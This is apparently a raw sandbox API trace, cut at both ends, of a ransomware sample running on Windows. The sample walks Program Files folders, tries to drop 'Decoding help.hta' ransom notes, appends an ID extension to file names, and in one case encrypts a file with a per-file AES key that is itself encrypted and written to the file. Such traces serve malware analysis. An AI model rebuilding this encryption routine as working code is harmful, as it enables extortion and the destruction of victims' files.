lstrcmpiW (lpString1="Decoding help.hta", lpString2="STINTL.DLL.IDX_DLL") returned -1 [0046.107] lstrlenW (lpString="STINTL.DLL.IDX_DLL") returned 18 [0046.107] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*" [0046.107] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*.*") returned 69 [0046.107] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\", lpString2="STINTL.DLL.IDX_DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL" [0046.107] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL" [0046.107] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0046.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.108] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0046.109] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0046.109] CryptAcquireContextA (in: phProv=0x334fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x334fcec*=0x3448d80) returned 1 [0046.109] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0x334fce8 | out: phKey=0x334fce8*=0x671cb0) returned 1 [0046.109] CryptExportKey (in: hKey=0x671cb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x334fbe4, pdwDataLen=0x334fce4 | out: pbData=0x334fbe4*, pdwDataLen=0x334fce4*=0x2c) returned 1 [0046.109] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3580) returned 0x2fe0000 [0046.112] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x334fbe4*, pdwDataLen=0x334fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x334fbe4*, pdwDataLen=0x334fcf8*=0x100) returned 1 [0046.112] CryptEncrypt (in: hKey=0x671cb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fe0000, pdwDataLen=0x334fce4*=0x3580, dwBufLen=0x3580 | out: pbData=0x2fe0000*, pdwDataLen=0x334fce4*=0x3580) returned 1 [0046.113] UnmapViewOfFile (lpBaseAddress=0x2fe0000) returned 1 [0046.114] CloseHandle (hObject=0x3c4) returned 1 [0046.114] CryptDestroyKey (hKey=0x671cb0) returned 1 [0046.114] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0046.114] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.114] WriteFile (in: hFile=0x3c0, lpBuffer=0x334fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x334fcf8, lpOverlapped=0x0 | out: lpBuffer=0x334fbe4*, lpNumberOfBytesWritten=0x334fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.115] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x334fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x334fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.115] CloseHandle (hObject=0x3c0) returned 1 [0046.116] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.116] FindNextFileW (in: hFindFile=0x671a30, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc65b900, ftCreationTime.dwHighDateTime=0x1caac22, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xdc65b900, ftLastWriteTime.dwHighDateTime=0x1caac22, nFileSizeHigh=0x0, nFileSizeLow=0x3580, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.IDX_DLL", cAlternateFileName="STINTL~1.IDX")) returned 0 [0046.116] FindClose (in: hFindFile=0x671a30 | out: hFindFile=0x671a30) returned 1 Thread: id = 582 os_tid = 0xd5c [0048.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*", lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8710 [0049.287] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.287] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.288] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.288] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.288] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0049.288] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0049.288] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0049.288] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0049.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 67 [0049.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0049.626] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0049.626] GlobalMemoryStatus (in: lpBuffer=0x3f8fd10 | out: lpBuffer=0x3f8fd10) [0049.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11047730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0049.629] CloseHandle (hObject=0x38c) returned 1 [0049.629] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc536f5be, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc536f5be, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x36fbb600, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSCommon.dll", cAlternateFileName="")) returned 1 [0049.629] lstrcpyW (in: lpString1=0x116f9b48, lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.629] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 67 [0049.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" [0049.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta")) returned 0xffffffff [0049.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.630] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0) returned 0 [0049.630] CloseHandle (hObject=0xffffffff) returned 0 [0049.630] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0049.630] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSCommon.dll") returned -1 [0049.630] lstrlenW (lpString="MSTTSCommon.dll") returned 15 [0049.630] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.630] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 67 [0049.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="MSTTSCommon.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" [0049.630] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" [0049.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0049.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.630] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc982ab94, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc982ab94, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3702e1f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSEngine.dll", cAlternateFileName="")) returned 1 [0049.631] lstrcpyW (in: lpString1=0x116f9b48, lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.631] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 67 [0049.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" [0049.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta")) returned 0xffffffff [0049.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.631] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0) returned 0 [0049.631] CloseHandle (hObject=0xffffffff) returned 0 [0049.631] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0049.631] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSEngine.dll") returned -1 [0049.631] lstrlenW (lpString="MSTTSEngine.dll") returned 15 [0049.631] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.631] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 67 [0049.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="MSTTSEngine.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" [0049.631] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" [0049.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0049.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.820] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d522f4, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc6d522f4, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSLoc.dll", cAlternateFileName="")) returned 1 [0050.118] lstrcpyW (in: lpString1=0x10c8e808, lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0050.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 67 [0050.118] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" [0050.118] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta")) returned 0xffffffff [0050.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.118] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0) returned 0 [0050.118] CloseHandle (hObject=0xffffffff) returned 0 [0050.118] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0050.119] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSLoc.dll") returned -1 [0050.119] lstrlenW (lpString="MSTTSLoc.dll") returned 12 [0050.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0050.119] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 67 [0050.119] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="MSTTSLoc.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" [0050.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" [0050.119] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0050.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.119] FindNextFileW (in: hFindFile=0x5d8710, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6d522f4, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc6d522f4, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSLoc.dll", cAlternateFileName="")) returned 0 [0050.119] FindClose (in: hFindFile=0x5d8710 | out: hFindFile=0x5d8710) returned 1 Thread: id = 583 os_tid = 0xd60 [0048.638] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*", lpFindFileData=0x6eafd30 | out: lpFindFileData=0x6eafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ab0 [0048.639] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.639] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x6eafd30 | out: lpFindFileData=0x6eafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.639] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.639] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.639] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x6eafd30 | out: lpFindFileData=0x6eafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad6ec00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5eb42550, 